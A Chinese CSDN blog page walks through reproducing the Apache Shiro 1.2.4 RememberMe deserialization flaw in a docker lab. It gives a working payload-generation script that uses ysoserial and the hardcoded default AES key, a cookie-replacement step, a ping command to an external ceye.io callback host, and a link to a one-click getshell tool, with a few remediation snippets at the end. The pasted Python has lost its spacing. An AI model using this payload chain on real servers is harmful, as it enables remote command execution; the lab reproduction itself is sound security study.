shrio反序列漏洞修复_Shiro RememberMe 1.2.4 反序列化漏洞详细复现

最新推荐文章于 2024-08-07 19:51:54 发布
最新推荐文章于 2024-08-07 19:51:54 发布
阅读量1.2k 收藏
点赞数
文章标签: shrio反序列漏洞修复
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33603377/article/details/113017443
版权
本文详细介绍了Shiro 1.2.4版本的RememberMe反序列化漏洞,包括环境搭建、利用工具和复现过程。通过执行特定命令生成payload,并在漏洞环境中利用此payload进行攻击。同时,提供了修复建议和相关资源链接,帮助读者理解并防范此类漏洞。
摘要由CSDN通过智能技术生成

目前已出图形化界面工具,一键即可检测和getshell

工具地址:

https://github.com/feihong-cs/ShiroExploit

使用案例:

5453fab7562775a22aa873b13907d644.png

15aaec8131926da55f233b33ee8b3311.png

df18c1fc24b42041728d3ee97513ef94.png

6c224d7857f30b223ba68755d8e7ea44.png

4e9ca3d7724bf87fd3148bc98b943f56.png

分割线(以上内容为最新更新内容)

————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————

0x00 前言

今天上班的时候收到了一个复测的任务,打开一看,shiro反序列化漏洞,What?这是个什么东西,经百度查找后才知道,原来是Java的开发框架,好吧,还是没听说过。。由于初测报告上的过程过于简略(唯一有用的只有KEY),所以不得不自己研究一番了。

97b41c7a9b7c5b80796089d049f7ce2c.png

0x01 环境搭建

漏洞版本<=1.2.4,使用docker搭建

docker pull medicean/vulapps:s_shiro_1

docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

访问80端口即可访问漏洞环境

0x02 工具准备

1、生成payload的脚本

将下面的脚本保存至本地命名为shiro_poc.py,然后进入linux系统/tmp目录下(如想使用其他KEY,替换脚本中的即可)

不要使用vi/vim命令创建文件再粘贴过去,粘贴会破坏代码的布局格式

命令行输入rz回车,就会跳出文件上传的页面(如果报错,pip安装一下),选择文件上传即可

#pip install pycrypto

importsysimportbase64importuuidfrom random importRandomimportsubprocessfrom Crypto.Cipher importAESdefencode_rememberme(command):

popen= subprocess.Popen(['java', '-jar', 'ysoserial-0.0.5-SNAPSHOT-all.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)

BS=AES.block_size

pad= lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) %BS)).encode()

key= "kPH+bIxk5D2deZiIxcaaaA=="mode=AES.MODE_CBC

iv=uuid.uuid4().bytes

encryptor=AES.new(base64.b64decode(key), mode, iv)

file_body=pad(popen.stdout.read())

base64_ciphertext= base64.b64encode(iv +encryptor.encrypt(file_body))returnbase64_ciphertextif __name__ == '__main__':

payload= encode_rememberme(sys.argv[1])

with open("/tmp/payload.cookie", "w") as fpw:print("rememberMe={}".format(payload.decode()), file=fpw)

2、安装模块

脚本使用的是python3,安装模块时要使用pip3 install 模块名

其中有一个模块需要强调,就是安装pycrypto,用来解决报错No module named Crypto.Cipher

pip3 install pycrypto

3、ysoserial的jar文件

依次执行以下命令(jar的文件名要和脚本中的一样,文件要和脚本在同一目录下)

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial

mvn package -DskipTests

cp target/ysoserial-0.0.5-SNAPSHOT-all.jar /tmp

0x03 复现过程

在脚本后面输入你想要执行的命令,例:

python3 shiro_poc.py "ping fkl2af.ceye.io"

然后便会在脚本所在目录下生成文件payload.cookie

712b6e029b4087df4064cfbd50878ba1.png

浏览器打开漏洞环境并登陆进去,点击account page抓包

643f948c3a41cde831067d11ab498b9d.png

用payload.cookie中内容替换Cookie中的全部内容,Go

7803919fb24184830c0f94d84077333e.png

到ceye平台查看即可到流量记录

9297e17610f26cca3f5688d5bda960d3.png

最后感谢达哥和豪哥的帮助,让我顺利完成复测

如想学习更多漏洞复现,欢迎关注公众号Timeline Sec

参考链接:

https://paper.seebug.org/shiro-rememberme-1-2-4/

遇见高中生
关注
Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)
薛定谔嘚喵博客
05-10 1573
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
shrio序列漏洞修复_GitHub - Ethancck/ShiroScan: Shiro RememberMe 1.2.4 反序列化漏洞图形化检测工具(Shiro-550)...
weixin_30865253的博客
01-17 986
Shiro反序列化检测工具ShiroScan用于检测存在Shiro反序列化漏洞的key值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck,即Xray Check)。功能简介默认DNSLOG选择后会调用dnslog.cn的接口,生成一个域名,进行检测后,结果会输出在结果区域。...
Apache Shiro 1.2.4反序列化漏洞复现
DXfighting_的博客
04-15 1695
下载使用反序列化利用工具ysoserial 项目地址:https://github.com/frohoff/ysoserial 适用maven在命令行下打包: mvn clean package -DskipTests(在项目目录下执行) 使用ysoserial生成CommonsBeanutils1的Gadget: java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsBeanutils1 "touch /tmp/success" &...
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4345
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
Shiro框架漏洞复现(附修复方法)
最新发布
C233333235的博客
08-07 518
Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。在Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。其Cookie的Key的值为RememberMe,Value的值是经过序列化、AES加密和Base64编码后得到的结果。
shiro反序列化漏洞修复
m0_67394360的博客
03-28 820
文章目录 shiro反序列化漏洞修复 前言 解决方案 shiro反序列化漏洞修复 前言 最近项目在进行安全漏洞扫描的时候,出现一个shiro反序列化漏洞的问题:目标IP站点存在Apache shiro 已知密钥泄露导致的远程代码执行漏洞。通过查找项目源码发现,在shiro的配置文件里,确实写死了一个秘钥,在开发环境的中不建议直接写死秘钥,大家要引以为戒! 解决方案 后面通过源码分析,发现了shiro有自己的随机生成秘钥的方法。既然找到的方法,那就好说了,按照源码的方式新写一个秘钥生成器 pu
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 5397
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞
梦之旅行地
02-05 2616
1、漏洞利用前提: Apache Shiro <= 1.2.4 2、靶场: 利用vulhub的靶场在服务器上搭建 注:docker相关配置就没有写了,靶场能运行就行 靶场搭建 git clone https://github.com/vulhub/vulhub.git cd /vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 启...
shrio序列漏洞修复_Shiro反序列化漏洞检测及修复(工具分享)
weixin_42439808的博客
01-30 1901
写在前面这篇博文主要解决于一些朋友为了修复反序列化漏洞,根据某些帖子的内容升级了shiro版本,或者采用了随机生成key的方式后,不知道是否管用。特地写下一篇记录,分享一个检测工具。我在之前项目中碰到了这个问题,由于shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。在此特别...
shrio序列漏洞修复_shiro反序列化漏洞
weixin_30247833的博客
01-17 3350
shrio反序列化漏洞一、漏洞介绍Shiro 是 Java 的一个安全框架。Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。参考文章:http:/...
Shiro反序列化漏洞Shiro版本升级资源
06-22
shiro版本<=1.2.4时,其参数remeberMe存在硬编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解密,最后反序列化。但在这个过程中,其AES的Key硬编码,导致反序列化...
Shiro RememberMe 1.2.4 反序列化漏洞复现
weixin_44281516的博客
08-27 411
环境 kali虚拟机 vps windwos物理机 安装docker环境 启动docker systemctl start docker 搭建靶场 git clone https://github.com/vulhub/vulhub.git cd vulhub/shiro/CVE-2016-4437 docker-compose up -d #启动靶场 访问页面 接下来就是淦,准备poc和vps(需要java环境) poc,百度找‘梦之履行地’大佬的 import sys import uuid
Apache Shiro 1.4.2 授权问题漏洞修复(CVE-2020-1957)
笑而不语的博客
11-04 3129
shiro 版本漏洞修复shiro 1.6.0 版本发布下载地址修复方法问题 shiro 1.6.0 版本发布 Apache Shiro 1.6.0 发布!修复绕过授权高危漏洞 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E 下载地址 1、官网下载地址:ht
shiro反序列化漏洞修复(使用随机密钥)
m0_67400973的博客
03-28 2696
说明:shiro低版本使用固定默认密钥,有被攻击的风险,可以升级shiro版本,Apache官方已在1.2.5及以上版本中修复漏洞,但是此方式有依赖冲突的风险。这里说说不升级版本的解决方案,这方案和官方的方案一样,都是使用生成的随机密钥 1、创建随机生成密钥工具 public class GenerateCipherKey { /** * 随机生成秘钥,参考org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNe
shiro漏洞部分修复方法
m0_60721514的博客
04-22 2222
1.shiro反序列化漏洞解决方案: https://blog.csdn.net/ying_521125/article/details/109893850 2.Xss漏洞攻击: 在程序内配有java类XssHttpServletRequestWrapperNew适配器,确定泰安那边的是否有这个类,若没有则加上。这个类引用到的相关类也修改.(SessionFilter) ...
[Java安全]Shiro RememberMe 1.2.4反序列化漏洞分析
Y4tacker的博客
07-26 769
文章目录写在前面Shiro RememberMe 1.2.4反序列化漏洞Payload 写在前面 Payload来自P神的Github Shiro RememberMe 1.2.4反序列化漏洞Shiro 1.2.4版本之前内置了一个默认且固定的加密 Key,导致攻击者可以伪造任意的rememberMe,进而触发反序列化漏洞,在这里我们还是配合TemplatesImpl执行字节码,但是如果使用Transformer数组则会报错,因为反序列化流中包含非Java自身的数组,则会出现无法加载类的错误 Trans
shiro反序列化漏洞复现
07-28
Apache Shiro反序列化漏洞是指攻击者可以利用Shiro框架中的反序列化漏洞,通过构造恶意的序列化数据,来执行任意代码或者获取敏感信息的漏洞。攻击者可以通过发送恶意请求或者利用其他漏洞来触发该漏洞,从而实现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值